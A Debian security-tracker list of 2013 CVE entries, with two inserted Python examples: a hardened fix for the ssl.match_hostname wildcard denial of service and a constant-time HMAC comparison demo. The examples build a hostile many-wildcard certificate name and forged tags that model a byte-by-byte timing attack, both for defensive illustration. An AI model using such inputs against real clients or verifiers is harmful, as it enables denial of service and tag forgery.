	RESERVED
CVE-2013-2151
	RESERVED
CVE-2013-2150
	RESERVED
CVE-2013-2149
	RESERVED
CVE-2013-2148
	RESERVED
CVE-2013-2147
	RESERVED
CVE-2013-2146
	RESERVED
CVE-2013-2145
	RESERVED
CVE-2013-2144
	RESERVED
CVE-2013-2143
	RESERVED
CVE-2013-2142
	RESERVED
CVE-2013-2141
	RESERVED
CVE-2013-2140
	RESERVED
CVE-2013-2139
	RESERVED
CVE-2013-2138
	RESERVED
CVE-2013-2137
	RESERVED
CVE-2013-2136
	RESERVED
CVE-2013-2135
	RESERVED
CVE-2013-2134
	RESERVED
CVE-2013-2133
	RESERVED
CVE-2013-2132
	RESERVED
CVE-2013-2131
	RESERVED
CVE-2013-2130
	RESERVED
CVE-2013-2129
	RESERVED
CVE-2013-2128
	RESERVED
CVE-2013-2127
	RESERVED
CVE-2013-2126
	RESERVED
CVE-2013-2125
	RESERVED
	- opensmtpd (bug #706985)
CVE-2013-2124
	RESERVED
CVE-2013-2123
	RESERVED
CVE-2013-2122
	RESERVED
CVE-2013-2121
	RESERVED
CVE-2013-2120
	RESERVED
CVE-2013-2119
	RESERVED
CVE-2013-2118
	RESERVED
CVE-2013-2117
	RESERVED
CVE-2013-2116
	RESERVED
CVE-2013-2115
	RESERVED
CVE-2013-2114
	RESERVED
CVE-2013-2113
	RESERVED
CVE-2013-2112
	RESERVED
CVE-2013-2111
	RESERVED
CVE-2013-2110
	RESERVED
CVE-2013-2109
	RESERVED
	NOT-FOR-US: WordPress plugin wp-cleanfix
CVE-2013-2108
	RESERVED
	NOT-FOR-US: WordPress plugin wp-cleanfix
CVE-2013-2107
	RESERVED
	NOT-FOR-US: WordPress plugin mail-on-update
CVE-2013-2106 [Authentication credential disclosure]
	RESERVED
	- webauth (vulnerable code only in 4.4.1 up to 4.5.2)
CVE-2013-2105
	RESERVED
	NOT-FOR-US: Show In Browser Ruby Gem
CVE-2013-2104
	RESERVED
CVE-2013-2103
	RESERVED
CVE-2013-2102
	RESERVED
CVE-2013-2101
	RESERVED
CVE-2013-2100
	RESERVED
	NOT-FOR-US: Gentoo Portage binary package installer
CVE-2013-2099 [ssl.match_hostname denial of service]
	RESERVED
	- python2.7 (low; bug #709066)
	[wheezy] - python2.7 (Minor issue)
	- linkchecker (low; bug #709067)
	[squeeze] - linkchecker (Minor issue)
	[wheezy] - linkchecker (Minor issue)
	- python3.2 (low; bug #708530)
	- python3.3 (low; bug #708530)
	- bzr 2.6.0~bzr6574-1 (low; bug #709068)
	[squeeze] - bzr (Minor issue)
	[wheezy] - bzr (Minor issue)
	- python-urllib3 1.6-2 (low; bug #709070)
	[wheezy] - python-urllib3 (Minor issue)
	- python-tornado (low; bug #709069)
	[squeeze] - python-tornado (Minor issue)
	[wheezy] - python-tornado (Minor issue)
	- w3af 2.6.0~bzr6574-1 (low; bug #709068)
	[squeeze] - w3af (Minor issue)
	[wheezy] - w3af (Minor issue)
CVE-2013-2098
	RESERVED
	NOTE: http://www.openwall.com/lists/oss-security/2013/05/16/5
	TODO: check
CVE-2013-2097 [zPanel themes remote command execution as root]
	RESERVED
	NOT-FOR-US: zPanel
CVE-2013-2096 [fails to verify image virtual size]
	RESERVED
	- nova
	TODO: check
CVE-2013-2095
	RESERVED
CVE-2013-2094 (The perf_swevent_init function in kernel/events/core.c in the Linux ...)
	{DSA-2669-1}
	- linux 3.8.11-1
	[squeeze] - linux-2.6 (Vulnerable code not present)
CVE-2013-2093
	RESERVED
	- dolibarr (bug #634783)
CVE-2013-2092
	RESERVED
	- dolibarr (bug #634783)
CVE-2013-2091
	RESERVED
	- dolibarr (bug #634783)
CVE-2013-2090 [Remote command injection]
	RESERVED
	NOT-FOR-US: Creme Fraiche Ruby Gem
CVE-2013-2089 [owncloud: oC-SA-2013-026]
	RESERVED
	- owncloud (Only affects 5.0.x)
CVE-2013-2088
	RESERVED
CVE-2013-2087 [gallery: multiple XSS]
	RESERVED
	- gallery
	TODO: check if affects 1.5.10.dfsg-1.1 and report bug
CVE-2013-2086 [owncloud: oC-SA-2013-027]
	RESERVED
	- owncloud (Only owncloud 5.0.x)
CVE-2013-2085 [owncloud: oC-SA-2013-020]
	RESERVED
	- owncloud (Only affects 5.0.x)
CVE-2013-2084
	RESERVED
CVE-2013-2083 [Form filtering issue]
	RESERVED
	- moodle (low)
	[squeeze] - moodle (Minor issue)
	NOTE: http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-38885
CVE-2013-2082 [Permission issue in blog comments]
	RESERVED
	- moodle
	NOTE: http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-37245
CVE-2013-2081 [Information leak in hub registration]
	RESERVED
	- moodle (low)
	[squeeze] - moodle (Minor issue)
	NOTE: http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-37822
CVE-2013-2080 [Potential information leak in Gradebook]
	RESERVED
	- moodle (low)
	[squeeze] - moodle (Minor issue)
	NOTE: http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-37475
CVE-2013-2079 [Capability issue in Assignment]
	RESERVED
	- moodle (Only affects 2.3 and later)
	NOTE: http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-38443
CVE-2013-2078
	RESERVED
CVE-2013-2077
	RESERVED
CVE-2013-2076
	RESERVED
CVE-2013-2075
	RESERVED
	- chicken (bug #702410)
	NOTE: CVE assigned due to incomplete fix for CVE-2012-6122
	TODO: check if we have the incomplete fix already applied
CVE-2013-2074 [prints passwords contained in HTTP URLs in error messages]
	RESERVED
	- kde4libs (low; bug #707776)
	[squeeze] - kde4libs (Minor issue)
	[wheezy] - kde4libs (Minor issue)
	NOTE: https://projects.kde.org/projects/kde/kdelibs/repository/revisions/65d736dab592bced4410ccfa4699de89f78c96ca/diff/kioslave/http/http.cpp
CVE-2013-2073
	RESERVED
CVE-2013-2072
	RESERVED
	- xen (low)
CVE-2013-2071 [Information disclosure]
	RESERVED
	- tomcat7 7.0.40-1 (bug #707704)
	NOTE: https://issues.apache.org/bugzilla/show_bug.cgi?id=54178
CVE-2013-2070 [nginx proxy_pass buffer overflow]
	RESERVED
	- nginx 1.4.1-1 (bug #708164)
	[squeeze] - nginx (Vulnerable code not present)
CVE-2013-2069
	RESERVED
CVE-2013-2068
	RESERVED
CVE-2013-2067 [Session fixation with FORM authenticator]
	RESERVED
	- tomcat7 7.0.33
	- tomcat6
CVE-2013-2066
	RESERVED
CVE-2013-2065
	RESERVED
CVE-2013-2064
	RESERVED
CVE-2013-2063
	RESERVED
CVE-2013-2062
	RESERVED
CVE-2013-2061 [use of non-constant-time memcmp in HMAC comparison in openvpn_decrypt]
	RESERVED
	- openvpn 2.3.1-1 (low; bug #707329)
	[squeeze] - openvpn (Minor issue)
	[wheezy] - openvpn (Minor issue)
	NOTE: https://community.openvpn.net/openvpn/wiki/SecurityAnnouncement-f375aa67cc
CVE-2013-2060
	RESERVED
	NOT-FOR-US: OpenShift
CVE-2013-2059 [Keystone: Deleted user can still create instances]
	RESERVED
	- keystone 2013.1.1-2 (bug #707598)
	[wheezy] - keystone (Minor issue)
	NOTE: http://lists.openstack.org/pipermail/openstack-announce/2013-May/000099.html
CVE-2013-2058 [linux: chipidea: allow disabling streaming in host mode]
	RESERVED
	- linux-2.6 (Vulnerable code not present)
	- linux 3.8-1
	[wheezy] - linux (Vulnerable code not present)
	NOTE: http://www.openwall.com/lists/oss-security/2013/05/03/2
CVE-2013-2057
	RESERVED
	NOT-FOR-US: YaBB
CVE-2013-2056
	RESERVED
CVE-2013-2055
	RESERVED
CVE-2013-2054
	RESERVED
CVE-2013-2053
	RESERVED
	- openswan (low; bug #709144)
	TODO: check strongswan
CVE-2013-2052
	RESERVED
CVE-2013-2051
	RESERVED
CVE-2013-2050
	RESERVED
CVE-2013-2049
	RESERVED
CVE-2013-2048 [owncloud: oC-SA-2013-025]
	RESERVED
	- owncloud (Only affects 5.0.x)
CVE-2013-2047 [owncloud: oC-SA-2013-023]
	RESERVED
	- owncloud (Only 5.0.x)
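The CVE-2013-2099 entry above records only "ssl.match_hostname denial of service". What follows is an added example, not code from Python, linkchecker, bzr, urllib3, tornado or w3af. It assumes the mechanism fixed upstream at the time: every "*" in a certificate DNS name was expanded into an unbounded regex atom, so a name with many wildcards in one label made a non-matching hostname cost combinatorial backtracking. The hardened matcher below caps wildcards at one, honours it only in the leftmost label, and compares label by label with plain string operations, so no regex is ever built from certificate data. The legacy converter is kept only to measure the cost; the certificate dict, names and hostnames are constructed for the demonstration.

```python
"""Bounded, regex-free certificate name matching (added example for CVE-2013-2099)."""
import re
import time


class CertificateError(ValueError):
    """Raised when a certificate name cannot be matched safely."""


def legacy_dnsname_to_pat(dn):
    """Assumed pre-fix shape, kept only for comparison: every '*' becomes an
    unbounded '[^.]*' inside one anchored regex, so a non-matching hostname
    forces the engine to try every split of the label between the wildcards."""
    pats = []
    for frag in dn.split('.'):
        if frag == '*':
            pats.append('[^.]+')
        else:
            pats.append(re.escape(frag).replace(r'\*', '[^.]*'))
    return re.compile(r'\A' + r'\.'.join(pats) + r'\Z', re.IGNORECASE)


def legacy_match_seconds(wildcards, label_len):
    """Wall-clock cost of the legacy matcher on a hostile name: `wildcards`
    stars in the first label, tested against a hostname it cannot match."""
    dn = 'a' + '*a' * wildcards + '.example.org'
    host = 'a' * label_len + 'b.example.org'
    pat = legacy_dnsname_to_pat(dn)
    start = time.perf_counter()
    pat.match(host)
    return time.perf_counter() - start


def dnsname_match(dn, hostname):
    """Match one certificate DNS name against a hostname (RFC 6125 6.4.3 rules):
    at most one '*', honoured only in the leftmost label, never across a dot,
    compared label by label with plain string operations (linear cost)."""
    if not dn or not hostname:
        return False
    dn_labels = dn.lower().split('.')
    host_labels = hostname.lower().split('.')
    leftmost, rest = dn_labels[0], dn_labels[1:]
    # Refuse before doing any matching work; this check is what closes the DoS.
    if leftmost.count('*') > 1:
        raise CertificateError('too many wildcards in certificate DNS name: %r' % dn)
    if len(dn_labels) != len(host_labels):
        return False
    # Labels right of the leftmost must match literally ('*' there is not a wildcard).
    if rest != host_labels[1:]:
        return False
    target = host_labels[0]
    if '*' not in leftmost:
        return leftmost == target
    if leftmost == '*':
        return bool(target)          # a bare '*' matches one non-empty label
    if leftmost.startswith('xn--') or target.startswith('xn--'):
        return leftmost == target    # no partial wildcards inside IDNA A-labels
    prefix, suffix = leftmost.split('*')
    return (len(target) >= len(prefix) + len(suffix)
            and target.startswith(prefix) and target.endswith(suffix))


def match_hostname(cert, hostname):
    """Walk subjectAltName DNS entries, then the subject CN only if there were
    none, the way ssl.match_hostname does; True on match, CertificateError otherwise."""
    dnsnames = []
    for key, value in cert.get('subjectAltName', ()):
        if key == 'DNS':
            if dnsname_match(value, hostname):
                return True
            dnsnames.append(value)
    if not dnsnames:
        for rdn in cert.get('subject', ()):
            for key, value in rdn:
                if key == 'commonName':
                    if dnsname_match(value, hostname):
                        return True
                    dnsnames.append(value)
    raise CertificateError('hostname %r does not match %r' % (hostname, dnsnames))


def raises_certificate_error(fn, *args):
    """True if fn(*args) refuses the input with CertificateError."""
    try:
        fn(*args)
    except CertificateError:
        return True
    return False


# Constructed sample in the dict shape SSLSocket.getpeercert() returns; not a real cert.
SAMPLE_CERT = {
    'subject': ((('commonName', 'example.org'),),),
    'subjectAltName': (('DNS', '*.example.org'), ('DNS', 'example.org')),
}

if __name__ == '__main__':
    print(match_hostname(SAMPLE_CERT, 'www.example.org'))
    print(raises_certificate_error(dnsname_match, 'a*a*a*a*a*a*a*a*.example.org', 'aaaaaaaa.example.org'))
    for k in (4, 6, 8):   # legacy cost grows combinatorially with the wildcard count
        print(k, 'wildcards: %.3fs' % legacy_match_seconds(k, 24))
```

The wildcard count is checked before the label-count or literal comparisons so that a hostile certificate is rejected without any matching work at all; rejecting is the right outcome, since a name with several wildcards in one label is not something a public CA issues.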
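The CVE-2013-2061 entry above names a non-constant-time memcmp in the HMAC check of openvpn_decrypt. The following is an added example, mine and not OpenVPN's code: it models the early-exit comparison beside a constant-time one on genuine HMAC-SHA256 tags and counts the bytes examined instead of timing anything, so the leak shows up deterministically. The key and message are constructed sample values; hmac.compare_digest is the standard-library primitive production code should call rather than a hand-rolled loop.

```python
"""Early-exit vs constant-time tag comparison (added example for CVE-2013-2061)."""
import hashlib
import hmac

TAG_LEN = 32  # HMAC-SHA256 output length


def early_exit_compare(a, b):
    """memcmp-style comparison: stops at the first differing byte.
    Returns (equal, bytes_examined); the second value is the side channel."""
    if len(a) != len(b):
        return False, 0
    examined = 0
    for x, y in zip(a, b):
        examined += 1
        if x != y:
            return False, examined
    return True, examined


def constant_time_compare(a, b):
    """Accumulate the XOR of every byte pair and decide only at the end, so the
    amount of work does not depend on where (or whether) the tags differ."""
    if len(a) != len(b):
        return False, 0
    diff = 0
    examined = 0
    for x, y in zip(a, b):
        examined += 1
        diff |= x ^ y
    return diff == 0, examined


def forged_tags(tag):
    """Attacker guesses sharing the first k bytes with tag, k = 0..len(tag)-1,
    with byte k flipped so every guess is wrong (constructed input)."""
    return [tag[:k] + bytes([tag[k] ^ 0xFF]) + tag[k + 1:]
            for k in range(len(tag))]


def work_profile(compare, tag):
    """Bytes examined by `compare` for each forged tag; if the numbers climb
    with the matching prefix, the tag can be recovered one byte at a time."""
    return [compare(tag, guess)[1] for guess in forged_tags(tag)]


def verify_tag(key, message, tag):
    """What production code should do: recompute the tag and compare it with
    hmac.compare_digest, which also handles unequal lengths safely."""
    expected = hmac.new(key, message, hashlib.sha256).digest()
    return hmac.compare_digest(expected, tag)


KEY = b"constructed-demo-key"       # constructed sample key, not a real secret
MESSAGE = b"packet payload 0001"    # constructed sample message
TAG = hmac.new(KEY, MESSAGE, hashlib.sha256).digest()

if __name__ == "__main__":
    print("early-exit bytes examined:", work_profile(early_exit_compare, TAG))
    print("constant-time bytes examined:", work_profile(constant_time_compare, TAG))
    print("verify_tag on the genuine tag:", verify_tag(KEY, MESSAGE, TAG))
```

The early-exit profile climbs 1, 2, ..., 32 as the guessed prefix lengthens, which is exactly the signal a remote attacker measures as response time; the constant-time profile is flat at 32 whatever the guess. A pure-Python loop is only a model of the fixed C code (the interpreter adds its own timing noise), which is why the verification path uses hmac.compare_digest.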
CVE-2013-2046 [owncloud: oC-SA-2013-019]
	RESERVED
	- owncloud (Only affects 4.5.x)
CVE-2013-2045 [owncloud: oC-SA-2013-019]
	RESERVED
	- owncloud (Only affects 5.0.x)
CVE-2013-2044 [owncloud: oC-SA-2013-022]
	RESERVED
	- owncloud (Only 5.0.x)
CVE-2013-2043 [owncloud: oC-SA-2013-024]
	RESERVED
	- owncloud (Only 5.0.x and 4.5.x)
CVE-2013-2042 [owncloud: oC-SA-2013-021]
	RESERVED
	- owncloud 4.0.15debian-1
CVE-2013-2041 [owncloud: oC-SA-2013-021]
	RESERVED
	- owncloud (Only affects 5.0.x)
CVE-2013-2040 [owncloud: oC-SA-2013-021]
	RESERVED
	- owncloud 4.0.15debian-1
CVE-2013-2039 [owncloud: oC-SA-2013-020]
	RESERVED
	- owncloud 4.0.15debian-1
CVE-2013-2038 [DoS (packet parser crash) in the AIS driver when processing malformed packet]
	RESERVED
	- gpsd 3.6-5 (bug #706665)
	[wheezy] - gpsd (Minor issue)
	NOTE: http://lists.nongnu.org/archive/html/gpsd-dev/2013-05/msg00000.html
CVE-2013-2037 [httplib2: SSL cert incorrect error handling]
	RESERVED
	- python-httplib2 (low; bug #706602)
	[squeeze] - python-httplib2 (Minor issue)
	[wheezy] - python-httplib2 (Minor issue)
	NOTE: http://openwall.com/lists/oss-security/2013/05/01/5
CVE-2013-2036
	RESERVED
CVE-2013-2035
	RESERVED
	- hawtjni (bug #708293)
CVE-2013-2034 [jenkins CSRF]
	RESERVED
	- jenkins (bug #706725)
CVE-2013-2033 [jenkins XSS]
	RESERVED
	- jenkins (bug #706725)
CVE-2013-2032 [Extensions can't fully block password changes]
	RESERVED
	- mediawiki 1:1.19.6-1 (bug #706601)
	NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=46590
CVE-2013-2031 [SVG JavaScript detection bypass]
	RESERVED
	- mediawiki 1:1.19.6-1 (bug #706601)
	NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=47304
CVE-2013-2030 [Nova uses insecure keystone middleware tmpdir by default]
	RESERVED
	- nova (Option not present in nova/2012.1.1)
	NOTE: http://lists.openstack.org/pipermail/openstack-announce/2013-May/000098.html
CVE-2013-2029
	RESERVED
	- nagios (Affected file nagios.upgrade_to_v3.sh not in Debian)
	NOTE: http://www.openwall.com/lists/oss-security/2013/04/30/8
CVE-2013-2028 [nginx http_transfer_encoding buffer overflow]
	RESERVED
	- nginx (Vulnerable code not present)
CVE-2013-2027
	RESERVED
CVE-2013-2026
	RESERVED
CVE-2013-2025
	RESERVED
	NOT-FOR-US: Ushahidi
CVE-2013-2024 [OS command injection vulnerability in Chicken Scheme]
	RESERVED
	- chicken (bug #706525)
	NOTE: http://lists.nongnu.org/archive/html/chicken-announce/2013-04/msg00000.html
CVE-2013-2023
	RESERVED
	- jquery-jplayer 2.3.0-1
	NOTE: used for jPlayer 2.2.23 XSS
	NOTE: http://www.openwall.com/lists/oss-security/2013/05/05/3
	TODO: check if 2.1.0-2 already fixed this issue
CVE-2013-2022
	RESERVED
	- jquery-jplayer 2.1.0-2
	NOTE: https://github.com/happyworm/jPlayer/commit/c5fe17bb4459164bd59153b57248cf94b8867373
	NOTE: used for jPlayer 2.2.20 XSS
	NOTE: http://www.openwall.com/lists/oss-security/2013/05/05/3
CVE-2013-2021 (pdf.c in ClamAV 0.97.1 through 0.97.7 allows remote attackers to cause ...)
	- clamav 0.97.8+dfsg-1
CVE-2013-2020 (Integer underflow in the cli_scanpe function in pe.c in ClamAV before ...)
	- clamav 0.97.8+dfsg-1
CVE-2013-2019 [stack overflow vulnerabilities in the XML parser]
	RESERVED
	- boinc 6.13.6+dfsg-1
	NOTE: http://boinc.berkeley.edu/gitweb/?p=boinc-v2.git;a=commitdiff;h=9a4140ae30a72e5175f3f31646d91f2d58df7156
CVE-2013-2018 [SQL injections in the server-side scheduler code]
	RESERVED
	- boinc 7.0.65+dfsg-1 (low)
	[squeeze] - boinc (Vulnerable code not present)
	[wheezy] - boinc (Minor issue)
	NOTE: server-maker not shipped in squeeze
CVE-2013-2017 (The veth (aka virtual Ethernet) driver in the Linux kernel before ...)
	- linux 2.6.34-1
	- linux-2.6 2.6.34-1
	[squeeze] - linux-2.6 (Introduced in 2.6.33)
	NOTE: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=6ec82562ffc6f297d0de36d65776cff8e5704867
	NOTE: http://marc.info/?l=linux-netdev&m=127310770900442&w=3
CVE-2013-2016 [qemu: virtio: out-of-bounds config space access]
	RESERVED
	- qemu
	- qemu-kvm
	NOTE: https://lists.gnu.org/archive/html/qemu-devel/2013-04/msg05013.html
	NOTE: https://lists.gnu.org/archive/html/qemu-devel/2013-04/msg05254.html
	NOTE: http://marc.info/?l=oss-security&m=136722323931507&w=2
	NOTE: Only practically affects virtio-rng according to the oss-security reference (and only if mmap_min_addr = 0)
	TODO: check
CVE-2013-2015 (The ext4_orphan_del function in fs/ext4/namei.c in the Linux kernel ...)
	{DSA-2669-1 DSA-2668-1}
	- linux 3.8-1 (low)
	- linux-2.6 (low)
CVE-2013-2014 [no limitation for requests and headers size which can cause a crash]
	RESERVED
	- keystone (bug #708515)
	NOTE: fixed in 2013.1-1 for experimental
CVE-2013-2013 [OpenStack keystone password disclosure on command line]
	RESERVED
	- python-keystoneclient
	NOTE: https://bugs.launchpad.net/python-keystoneclient/+bug/938315
	TODO: check and report to BTS
CVE-2013-2012 [autojump profile will load random stuff from a directory called custom_install]
	RESERVED
	- autojump (vulnerable code not present for unstable)
	NOTE: experimental affected as per 21.5.1-1, see #706252
	NOTE: experimental fixed as 21.5.1-2
CVE-2013-2011
	RESERVED
	NOT-FOR-US: WP Super Cache
	NOTE: this issue exists because of an incomplete fix for CVE-2013-2009
CVE-2013-2010
	RESERVED
	NOT-FOR-US: W3 Total Cache
CVE-2013-2009
	RESERVED
	NOT-FOR-US: WP Super Cache
CVE-2013-2008
	RESERVED
	NOT-FOR-US: WP Super Cache
CVE-2013-2007
	RESERVED
	- qemu (qemu guest agent, only from the version in experimental onwards)
CVE-2013-2006 [OpenStack keystone LDAP password disclosure in log files]
	RESERVED
	- keystone
	NOTE: https://review.openstack.org/#/c/26826/2/keystone/common/config.py
	NOTE: https://bugs.launchpad.net/keystone/+bug/1172195
	TODO: check
CVE-2013-2005
	RESERVED
CVE-2013-2004
	RESERVED
CVE-2013-2003
	RESERVED
CVE-2013-2002
	RESERVED
CVE-2013-2001
	RESERVED
CVE-2013-2000
	RESERVED
CVE-2013-1999
	RESERVED
CVE-2013-1998
	RESERVED
CVE-2013-1997
	RESERVED
CVE-2013-1996
	RESERVED
CVE-2013-1995
	RESERVED
CVE-2013-1994
	RESERVED
CVE-2013-1993
	RESERVED
CVE-2013-1992
	RESERVED
CVE-2013-1991
	RESERVED
CVE-2013-1990
	RESERVED
CVE-2013-1989
	RESERVED
CVE-2013-1988
	RESERVED
CVE-2013-1987
	RESERVED
CVE-2013-1986
	RESERVED
CVE-2013-1985
	RESERVED
CVE-2013-1984
	RESERVED
CVE-2013-1983
	RESERVED
CVE-2013-1982
	RESERVED
CVE-2013-1981
	RESERVED
CVE-2013-1980
	RESERVED
	- xmp 3.4.0-3 (low; bug #706667)
	[wheezy] - xmp (Minor issue)
	[squeeze] - xmp (Minor issue)
CVE-2013-1979 (The scm_set_cred function in include/net/scm.h in the Linux kernel ...)
	{DSA-2669-1}
	- linux 3.8.11-1
	- linux-2.6 (Introduced in 2.6.36)
CVE-2013-1978
	RESERVED
CVE-2013-1977
	RESERVED
	- keystone (permissions to /etc/keystone/keystone.conf restricted in postinst)
	NOTE: http://www.openwall.com/lists/oss-security/2013/04/19/2
CVE-2013-1976
	RESERVED
CVE-2013-1975
	RESERVED
CVE-2013-1974
	RESERVED
CVE-2013-1973
	RESERVED
	NOT-FOR-US: Drupal contributed module
CVE-2013-1972
	RESERVED
	NOT-FOR-US: Drupal contributed module
CVE-2013-1971
	RESERVED
	NOT-FOR-US: Drupal contributed module
CVE-2013-1970
	REJECTED
	NOTE: rejected, erroneously assigned for libxml2
CVE-2013-1969 (Multiple use-after-free vulnerabilities in libxml2 2.9.0 and possibly ...)
	- libxml2 (Affecting only 2.9.x, see bug #705722)
	NOTE: https://git.gnome.org/browse/libxml2/commit/?id=de0cc20c29cb3f056062925395e0f68d2250a46f
CVE-2013-1968
	RESERVED
CVE-2013-1967 [mediaelement flashmediaelement XSS]
	RESERVED
	- owncloud (Vulnerable code not present)
	NOTE: oC >= 4.5 only
CVE-2013-1966
	RESERVED
CVE-2013-1965
	RESERVED
CVE-2013-1964 [grant table hypercall acquire/release imbalance]
	RESERVED
	{DSA-2666-1}
	- xen 4.1.4-3
	NOTE: http://lists.xen.org/archives/html/xen-announce/2013-04/msg00006.html
CVE-2013-1963
	RESERVED
	- owncloud (Vulnerable code not present)
	NOTE: oC >= 4.5 only
CVE-2013-1962 [DoS (max count of open files exhaustion) due to a socket leak in the storage pool]
	RESERVED
	- libvirt (Vulnerable code not present)
	NOTE: http://libvirt.org/git/?p=libvirt.git;a=commitdiff;h=ca697e90d5bd6a6dfb94bfb6d4438bdf9a44b739
CVE-2013-1961 [libtiff-tools: Stack-based buffer overflow with malformed image-length and resolution]
	RESERVED
	- tiff (bug #706674)
CVE-2013-1960 [libtiff-tools: Heap-based buffer overflow in t2_process_jpeg_strip]
	RESERVED
	- tiff (bug #706675)
CVE-2013-1959 (kernel/user_namespace.c in the Linux kernel before 3.8.9 does not have ...)
	- linux 3.8.11-1
	[wheezy] - linux (Introduced in 3.7)
	- linux-2.6 (Introduced in 3.7)
CVE-2013-1958 (The scm_check_creds function in net/core/scm.c in the Linux kernel ...)
	- linux
CVE-2013-1957 (The clone_mnt function in fs/namespace.c in the Linux kernel before ...)
	- linux
CVE-2013-1956 (The create_user_ns function in kernel/user_namespace.c in the Linux ...)
	- linux 3.8.11-1
CVE-2013-1955
	RESERVED
	NOT-FOR-US: Easy PHP Calendar
CVE-2013-1954 [Buffer Overflow in ASF Demuxer]
	RESERVED
	- vlc 2.0.6-1 (bug #705136)
	NOTE: http://www.videolan.org/security/sa1302.html
CVE-2013-1953 [stack-based buffer overflow in bmp parser]
	RESERVED
	- autotrace (low)
	- gimp 2.6.10-1
	NOTE: GIMP was fixed earlier, but only the squeeze version was checked
	NOTE: In GIMP the code was introduced with d9c6f88141aecf956c5d721168f795de0e3027b8
	NOTE: and fixed with 57f805a159874107c6c98065f9aa648c3634b8fd
	NOTE: https://git.gnome.org/browse/gimp/commit/?h=d9c6f88141aecf956c5d7
	NOTE: https://git.gnome.org/browse/gimp/commit/?h=57f805a159874107c6c98
CVE-2013-1952 (Xen 4.x, when using Intel VT-d for a bus mastering capable PCI device, ...)
	{DSA-2666-1}
	- xen 4.1.4-4
CVE-2013-1951
	RESERVED
	- mediawiki 1:1.19.5-1
CVE-2013-1950
	RESERVED
	- libtirpc (regression code not present)
	NOTE: Regression introduced with 82cc2e6129c872c8be09381055f2fb5641c5e6fe
	NOTE: Regression fixed with a9f437119d79a438cb12e510f3cadd4060102c9f
	NOTE: http://www.openwall.com/lists/oss-security/2013/04/22/9
CVE-2013-1949 (Social Media Widget (social-media-widget) plugin 4.0 for WordPress ...)
	NOT-FOR-US: WordPress Social Media Widget
CVE-2013-1948 (converter.rb in the md2pdf gem 0.0.1 for Ruby allows context-dependent ...)
	NOT-FOR-US: Ruby gem md2pdf
CVE-2013-1947 (kelredd-pruview gem 0.3.8 for Ruby allows context-dependent attackers ...)
	NOT-FOR-US: Ruby gem kelredd-pruview
CVE-2013-1946
	RESERVED
	NOT-FOR-US: RESTful Web Services (RESTWS) Drupal contributed module
CVE-2013-1945
	RESERVED
CVE-2013-1944 (The tailMatch function in cookie.c in cURL and libcurl before 7.30.0 ...)
	{DSA-2660-1}
	- curl 7.29.0-2.1 (bug #705274)
	[wheezy] - curl 7.26.0-1+wheezy2
	NOTE: http://curl.haxx.se/docs/adv_20130412.html
CVE-2013-1943
	RESERVED
CVE-2013-1942 [XSS vulnerability in jPlayer]
	RESERVED
	- owncloud (Depends on libjs-jquery-jplayer)
	- jquery-jplayer 2.1.0-2
	NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-014/
	NOTE: https://github.com/happyworm/jPlayer/commit/e8ca190f7f972a6a421cb95f09e138720e40ed6d
CVE-2013-1941 [PostgreSQL: Insecure database password generator]
	RESERVED
	- owncloud
	NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-015/
CVE-2013-1940 (X.Org X server before 1.13.4 and 1.4.x before 1.14.1 does not properly ...)
	{DSA-2661-1}
	- xorg-server 2:1.12.4-6
CVE-2013-1939 [Windows: Local file disclosure]
	RESERVED
	- owncloud (Windows version only)
	- php-sabredav (only when running on Windows hosts)
	NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-016/
CVE-2013-1938
	RESERVED
	NOT-FOR-US: Zimbra
CVE-2013-1937 (Multiple cross-site scripting (XSS) vulnerabilities in ...)
	- phpmyadmin (Affected are versions 3.5.0 to 3.5.7, older versions not vulnerable)
	NOTE: http://seclists.org/fulldisclosure/2013/Apr/100
	NOTE: https://github.com/phpmyadmin/phpmyadmin/commit/79089c9bc02c82c15419fd9d6496b8781ae08a5a
CVE-2013-1936
	RESERVED
CVE-2013-1935
	RESERVED
CVE-2013-1934 [mantis: XSS issue on Configuration Report page when displaying complex value]
	RESERVED
	- mantis (low)
	[wheezy] - mantis (Minor issue)
	[squeeze] - mantis (Minor issue)
	TODO: File bug
	NOTE: http://www.openwall.com/lists/oss-security/2013/04/04/8
	NOTE: http://www.mantisbt.org/bugs/view.php?id=15416
CVE-2013-1933 (The extract_from_ocr function in lib/docsplit/text_extractor.rb in the ...)
	NOT-FOR-US: Karteek Docsplit Ruby Gem
CVE-2013-1932 [mantis: XSS vulnerability on Configuration Report page]
	RESERVED
	- mantis (affects Mantis 1.2.13 only)
	NOTE: http://www.openwall.com/lists/oss-security/2013/04/04/8
CVE-2013-1931 [mantis: XSS vulnerability when deleting a version]
	RESERVED
	- mantis (affects Mantis 1.2.14 only)
	NOTE: http://www.openwall.com/lists/oss-security/2013/04/04/8
CVE-2013-1930 [mantis: Close button available to users despite workflow restrictions]
	RESERVED
	- mantis (affects only Mantis 1.2.12 and later)
	NOTE: http://www.openwall.com/lists/oss-security/2013/04/04/8
CVE-2013-1929 [tg3 VPD firmware -> driver injection]
	RESERVED
	{DSA-2669-1 DSA-2668-1}
	- linux 3.8.11-1
	- linux-2.6
CVE-2013-1928 (The do_video_set_spu_palette function in fs/compat_ioctl.c in the ...)
	{DSA-2668-1}
	- linux 3.2.35-1
	- linux-2.6
CVE-2013-1927 (The IcedTea-Web plugin before 1.2.3 and 1.3.x before 1.3.2 allows ...)
	- icedtea-web 1.3.2-1
CVE-2013-1926 (The IcedTea-Web plugin before 1.2.3 and 1.3.x before 1.3.2 uses the ...)
	- icedtea-web 1.3.2-1
CVE-2013-1925
	RESERVED
	NOT-FOR-US: CTools module for Drupal
CVE-2013-1924
	RESERVED
	NOT-FOR-US: Commerce Skrill Drupal module
CVE-2013-1923 [rpc.gssd is vulnerable to DNS spoofing]
	RESERVED
	- nfs-utils 1:1.2.8-1 (low; bug #707401)
	[squeeze] - nfs-utils (Minor issue)
	[wheezy] - nfs-utils (Minor issue)
